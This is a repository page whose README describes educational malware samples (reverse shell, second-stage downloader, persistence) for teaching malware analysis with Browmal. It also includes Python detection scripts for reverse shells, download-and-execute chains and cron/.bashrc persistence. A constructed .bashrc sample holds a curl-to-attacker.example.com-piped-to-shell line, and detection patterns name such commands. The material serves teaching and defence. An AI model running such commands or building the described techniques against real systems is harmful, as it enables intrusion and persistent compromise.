  • C 83.7%
  • Makefile 16.3%
Mark Wilkinson d2614c976e
Revise README for clarity and legal information
Updated README to clarify educational purpose and usage with Browmal. Removed compilation details and added legal disclaimers.
2025-10-29 01:22:10 -04:00
linux init 2025-10-29 00:07:33 -04:00
windows init 2025-10-29 00:07:33 -04:00
.gitignore init 2025-10-29 00:07:33 -04:00
BUILD.md init 2025-10-29 00:07:33 -04:00
Makefile init 2025-10-29 00:07:33 -04:00
popcmdmacro.docx init 2025-10-29 00:07:33 -04:00
popcmdmacro.odt init 2025-10-29 00:07:33 -04:00
README.md Revise README for clarity and legal information 2025-10-29 01:22:10 -04:00

Malware Analysis Educational Samples

A collection of educational C samples demonstrating common malware techniques for teaching malware analysis. These samples are non-functional and designed purely for learning malware analysis with Browmal.

Overview

This project contains 6 educational samples (3 for Linux, 3 for Windows) that demonstrate:

  1. Reverse Shell - Remote command execution over network
  2. Second-Stage Downloader - Multi-stage attack patterns
  3. Persistence Mechanisms - Techniques for surviving reboots

Directory Structure

browmal-samples/
├── README.md             # This file
├── BUILD.md              # Detailed build instructions
├── Makefile              # Root Makefile (build both platforms)
├── linux/
│   ├── Makefile          # Linux-specific Makefile
│   ├── sample1_reverse_shell.c
│   ├── sample2_downloader.c
│   ├── sample3_persistence.c
│   └── bin/              # Compiled binaries
└── windows/
    ├── Makefile          # Windows-specific Makefile
    ├── sample1_reverse_shell.c
    ├── sample2_downloader.c
    ├── sample3_persistence.c
    └── bin/              # Compiled binaries

Quick Start

Build Linux Samples (on Linux)

cd browmal-samples
make linux

Build Windows Samples (from Linux, cross-compile)

# Install MinGW first
sudo apt install mingw-w64

# Build
cd browmal-samples
make windows

Build Both

make all

Clean

make clean

Samples Overview

Sample 1: Reverse Shell

Linux: linux/bin/sample1_reverse_shell

  • Creates TCP socket
  • Connects to C2 server (192.168.1.100:4444)
  • Redirects I/O with dup2()
  • Spawns /bin/sh for remote command execution

Key IOCs:

  • Unexpected socket() calls
  • Outbound TCP connections
  • Process spawning without user interaction
  • I/O redirection
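The dup2() step above is also the detection handle: once stdin, stdout and stderr have been redirected onto the connection, /proc/<pid>/fd/0, 1 and 2 of the spawned shell resolve to "socket:[inode]" instead of a pty or a file. The following Python is an added example written for this page, not code from the repository; the two fd tables at the bottom are constructed, the shell-name list is an assumption, and the live scan assumes a Linux host with a readable /proc.

```python
"""Added example: flag processes whose stdio (fds 0-2) is a TCP socket,
the state a reverse shell leaves behind after dup2(). Not repository code."""
import os
import re
from typing import Dict, List

# /proc/<pid>/fd/N is a symlink; a socket's link target reads "socket:[INODE]".
_SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")
# Shell names as they appear in /proc/<pid>/comm (assumed list; extend as needed).
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}


def stdio_socket_inodes(fd_links: Dict[int, str]) -> List[int]:
    """Return the socket inode for each of fds 0, 1, 2 that points at a socket.

    fd_links maps fd number -> readlink() target. An interactive shell has a
    pty (/dev/pts/N) here; a reverse shell has the same socket on all three.
    """
    inodes = []
    for fd in (0, 1, 2):
        match = _SOCKET_LINK.match(fd_links.get(fd, ""))
        if match:
            inodes.append(int(match.group(1)))
    return inodes


def is_reverse_shell_candidate(fd_links: Dict[int, str], comm: str) -> bool:
    """True when a shell process has all three stdio fds on one socket."""
    inodes = stdio_socket_inodes(fd_links)
    return comm in SHELLS and len(inodes) == 3 and len(set(inodes)) == 1


def read_fd_links(pid: int) -> Dict[int, str]:
    """Resolve every /proc/<pid>/fd symlink (Linux only; may need root)."""
    links: Dict[int, str] = {}
    fd_dir = f"/proc/{pid}/fd"
    for name in os.listdir(fd_dir):
        try:
            links[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # fd closed between listdir() and readlink()
    return links


def scan_procfs() -> List[int]:
    """Walk /proc and return pids matching the reverse-shell stdio pattern."""
    hits = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            links = read_fd_links(pid)
        except OSError:
            continue  # process exited or is not readable
        if is_reverse_shell_candidate(links, comm):
            hits.append(pid)
    return hits


# Constructed fd tables for illustration, not captured from a real host.
NORMAL_SHELL = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0", 3: "socket:[55555]"}
REVERSE_SHELL = {0: "socket:[40123]", 1: "socket:[40123]", 2: "socket:[40123]"}

if __name__ == "__main__":
    print("normal shell flagged:", is_reverse_shell_candidate(NORMAL_SHELL, "bash"))  # False
    print("reverse shell flagged:", is_reverse_shell_candidate(REVERSE_SHELL, "sh"))  # True
    if os.path.isdir("/proc"):
        print("candidate pids on this host:", scan_procfs())
```

A shell with a socket on fd 3 and a pty on fds 0-2 (the NORMAL_SHELL table) is an ordinary interactive session and is not flagged; only the all-three-on-one-socket shape is. Some legitimate service managers also start shells with socket stdio, so the hit list is a triage queue to pair with the outbound-connection IOC, not a verdict.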

Windows: windows/bin/sample1_reverse_shell.exe

  • Initializes Winsock API
  • Creates TCP socket
  • Uses CreatePipe() for I/O redirection
  • Spawns cmd.exe with CREATE_NO_WINDOW
  • Demonstrates anonymous pipe usage

Key Windows APIs:

  • WSAStartup() / WSACleanup()
  • socket() / connect()
  • CreatePipe() / CreateProcess()

Sample 2: Second-Stage Downloader

Linux: linux/bin/sample2_downloader

  • DNS resolution with gethostbyname()
  • HTTP socket communication
  • File download to /tmp
  • File execution with system()
  • Cleanup with unlink()

Key IOCs:

  • Outbound HTTP/HTTPS to suspicious domains
  • Files written to temp directories
  • Rapid download → execute pattern
  • File permission changes
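The "rapid download → execute" IOC above is a correlation between events rather than a single event. This Python is an added example for this page, not code from the repository: it reads a constructed, simplified event format, "<ISO timestamp> pid=<n> <action> <path>", which stands in for whatever syscall or audit source is available, and flags a temp-directory file that is written and then executed within an assumed 30-second window, also recording a permission change before the exec and an unlink after it, the sequence the Linux sample description lists (download, permission change, system(), unlink()).

```python
"""Added example: correlate write -> chmod -> execve -> unlink events on
temp-directory paths to surface a download-and-execute sequence.
Not repository code; the log format and sample lines are constructed."""
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Optional

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
WINDOW = timedelta(seconds=30)  # assumed threshold; tune per environment


class Event(NamedTuple):
    ts: datetime
    pid: int
    action: str   # write | chmod | execve | unlink
    path: str


def parse_line(line: str) -> Optional[Event]:
    """Parse one line of the constructed format:
    '<ISO-timestamp> pid=<n> <action> <path>'. Returns None on malformed input."""
    parts = line.split(maxsplit=3)
    if len(parts) != 4 or not parts[1].startswith("pid="):
        return None
    try:
        ts = datetime.fromisoformat(parts[0])
        pid = int(parts[1][4:])
    except ValueError:
        return None
    return Event(ts, pid, parts[2], parts[3])


def find_download_execute(lines: List[str]) -> List[Dict]:
    """Return one finding per temp-dir file executed within WINDOW of being
    written. Lines are assumed to be in time order (unsorted input is not
    handled here)."""
    last_write: Dict[str, Event] = {}
    chmodded = set()
    executed: Dict[str, tuple] = {}   # path -> (finding index, exec timestamp)
    findings: List[Dict] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or not ev.path.startswith(TEMP_DIRS):
            continue
        if ev.action == "write":
            last_write[ev.path] = ev
            chmodded.discard(ev.path)        # new content resets the chmod flag
        elif ev.action == "chmod":
            chmodded.add(ev.path)
        elif ev.action == "execve" and ev.path in last_write:
            delta = ev.ts - last_write[ev.path].ts
            if timedelta(0) <= delta <= WINDOW:
                findings.append({
                    "path": ev.path,
                    "writer_pid": last_write[ev.path].pid,
                    "exec_pid": ev.pid,
                    "seconds": delta.total_seconds(),
                    "chmod_before_exec": ev.path in chmodded,
                    "unlinked_after": False,
                })
                executed[ev.path] = (len(findings) - 1, ev.ts)
        elif ev.action == "unlink":
            if ev.path in executed:
                idx, exec_ts = executed.pop(ev.path)
                if ev.ts - exec_ts <= WINDOW:
                    findings[idx]["unlinked_after"] = True  # self-cleaning payload
            last_write.pop(ev.path, None)
            chmodded.discard(ev.path)
    return findings


# Constructed sample events (not a capture from a real host).
SAMPLE_LOG = [
    "2025-10-29T00:07:33 pid=4242 write /tmp/.update",
    "2025-10-29T00:07:34 pid=4242 chmod /tmp/.update",
    "2025-10-29T00:07:35 pid=4242 execve /tmp/.update",
    "2025-10-29T00:07:36 pid=4242 unlink /tmp/.update",
    "2025-10-29T00:10:00 pid=1001 write /home/u/notes.txt",
    "2025-10-29T00:12:00 pid=1300 write /tmp/build.sh",
    "2025-10-29T00:20:00 pid=1300 execve /tmp/build.sh",
]

if __name__ == "__main__":
    for finding in find_download_execute(SAMPLE_LOG):
        print(finding)
```

Only /tmp/.update is reported: /tmp/build.sh is written and executed too, but eight minutes apart, which is the kind of build-tool behaviour the window is meant to leave alone. The chmod and unlink flags are carried on the finding so that the full write → chmod → execute → delete chain scores higher than a bare execute in triage.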

Windows: windows/bin/sample2_downloader.exe

  • WinINet API initialization
  • HTTP downloads via InternetOpenUrl()
  • Registry checks for antivirus
  • ShellExecute() with the "runas" verb to request elevation (privilege escalation)
  • Hidden file attributes

Key Windows APIs:

  • InternetOpen() / InternetOpenUrl()
  • InternetReadFile()
  • RegOpenKey() / RegQueryValue()
  • ShellExecute() with "runas" verb
  • CreateFile() with FILE_ATTRIBUTE_HIDDEN

Sample 3: Persistence Mechanisms

Linux: linux/bin/sample3_persistence

  • Copy to system directories (/usr/local/bin)
  • Cron job installation
  • Startup script modification (~/.bashrc)
  • Systemd service explanation
  • LD_PRELOAD discussion

Key Techniques (across both platforms):

  • Registry Run key persistence
  • Startup folder modifications
  • Cron job scheduling
  • Init script modification
  • Service creation
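Two of the Linux persistence locations listed above, the user crontab and ~/.bashrc, are plain text and can be audited with a small parser. This Python is an added example for this page, not the repository's code; the crontab and .bashrc contents are constructed, and the three heuristics (a command run from a temp directory, a hidden file under a home directory, a download piped into a shell) are assumptions to tune for a given environment.

```python
"""Added example: audit user crontab and ~/.bashrc text for entries that
launch payloads from unusual locations. Not repository code; samples and
heuristics are constructed."""
import re
from typing import List, NamedTuple

SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# "~/.name" or "/home/<user>/.name": a hidden path inside a home directory.
HIDDEN_IN_HOME = re.compile(r"(~|/home/[^/\s]+)/\.[^/\s]+")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
CRON_SPECIALS = {"@reboot", "@hourly", "@daily", "@weekly", "@monthly",
                 "@yearly", "@annually", "@midnight"}
CRON_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


class Finding(NamedTuple):
    source: str
    line_no: int
    reason: str
    text: str


def cron_command(line: str) -> str:
    """Return the command part of a crontab line, or '' for blank lines,
    comments, VAR=value assignments and malformed entries."""
    s = line.strip()
    if not s or s.startswith("#") or CRON_ASSIGNMENT.match(s):
        return ""
    if s.startswith("@"):                       # @reboot <command>
        parts = s.split(maxsplit=1)
        return parts[1] if len(parts) == 2 and parts[0] in CRON_SPECIALS else ""
    fields = s.split(maxsplit=5)                # m h dom mon dow <command>
    return fields[5] if len(fields) == 6 else ""


def suspicious_reason(cmd: str, *, flag_hidden_home: bool) -> str:
    """Explain why a command looks like a persistence payload, or return ''."""
    if any(d in cmd for d in SUSPECT_DIRS):
        return "executes from a temp directory"
    if flag_hidden_home and HIDDEN_IN_HOME.search(cmd):
        return "references a hidden file in a home directory"
    if PIPE_TO_SHELL.search(cmd):
        return "downloads and pipes to a shell"
    return ""


def audit_crontab(text: str) -> List[Finding]:
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = cron_command(line)
        reason = suspicious_reason(cmd, flag_hidden_home=True) if cmd else ""
        if reason:
            findings.append(Finding("crontab", n, reason, line.strip()))
    return findings


def audit_bashrc(text: str) -> List[Finding]:
    """Startup scripts legitimately source ~/.dotfiles, so the hidden-home
    rule is switched off here and only the other two apply."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        reason = suspicious_reason(s, flag_hidden_home=False)
        if reason:
            findings.append(Finding("bashrc", n, reason, s))
    return findings


# Constructed inputs, not taken from a real system.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
@reboot /tmp/.cache/update >/dev/null 2>&1
*/5 * * * * /home/alice/.sysd/agent
"""
SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH="$HOME/.local/bin:$PATH"
source ~/.nvm/nvm.sh
nohup /dev/shm/.x >/dev/null 2>&1 &
curl -s http://attacker.example.com/s.sh | sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB) + audit_bashrc(SAMPLE_BASHRC):
        print(f"{f.source}:{f.line_no}: {f.reason}: {f.text}")
```

The crontab parser handles the three line shapes a real file contains (comments and VAR=value assignments, @special entries, and five-field schedules), which is what keeps the backup job on line 3 out of the findings while the @reboot entry and the hidden agent are reported. The same command-level heuristics can be pointed at /etc/cron.d and the init or systemd unit files the sample also discusses once their command lines are extracted.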

Windows: windows/bin/sample3_persistence.exe

  • Registry Run key modification
  • Startup folder persistence
  • Scheduled task creation
  • Windows service explanation
  • AppInit_DLLs discussion

Key Windows APIs:

  • RegOpenKeyEx() / RegSetValueEx()
  • SHGetFolderPath()
  • CreateFile() for copying
  • Registry key manipulation

Building from Source

See BUILD.md for detailed build instructions including:

  • Cross-compilation from Linux to Windows
  • Cross-compilation from Windows to Linux
  • Compiler options and customization
  • Troubleshooting

Running the Samples

All samples are safe to run and will fail gracefully:

# Linux
./linux/bin/sample1_reverse_shell       # Fails connecting to unreachable C2
./linux/bin/sample2_downloader          # Fails DNS resolution
./linux/bin/sample3_persistence         # Demonstrates techniques (fails on permission)

# Windows (on Windows)
sample1_reverse_shell.exe
sample2_downloader.exe
sample3_persistence.exe

Educational Use

These samples are designed for teaching, specifically with Browmal but also:

  • Malware analysis courses
  • Security engineering training
  • Binary analysis workshops
  • Reverse engineering practice
  • Detection signature development

Important Notes

  • These are educational samples only - they are non-functional and designed for learning
  • The hardcoded C2 addresses (192.168.1.100:4444, attacker.example.com) are intentionally unreachable
  • No actual malicious code should execute
  • Files will fail gracefully when running (no network, permission denied, etc.)

Technical Details

Linux Samples

  • Architecture: x86-64
  • Executable Format: ELF 64-bit
  • Dependencies: libc (standard C library)
  • Syscalls and libc calls: socket, connect, fork, execve, system(), etc.

Windows Samples

  • Architecture: x86-64
  • Executable Format: PE32+ (Windows)
  • Dependencies: Winsock2, WinINet, Windows API
  • APIs: WSA*, InternetOpen*, CreateProcess, Registry functions, etc.

Disclaimer

These samples are designed for:

  • Educational purposes
  • Security training
  • Malware analysis courses
  • Authorized security research

They should never be modified to create actual malware. The authors assume no responsibility for misuse. The authors provide no guarantee of safety and hold no liability for any action taken with code or executables from this repository. Portions of this project were created/modified using artificial intelligence.

References

License

Educational use only. Provided as-is for teaching purposes.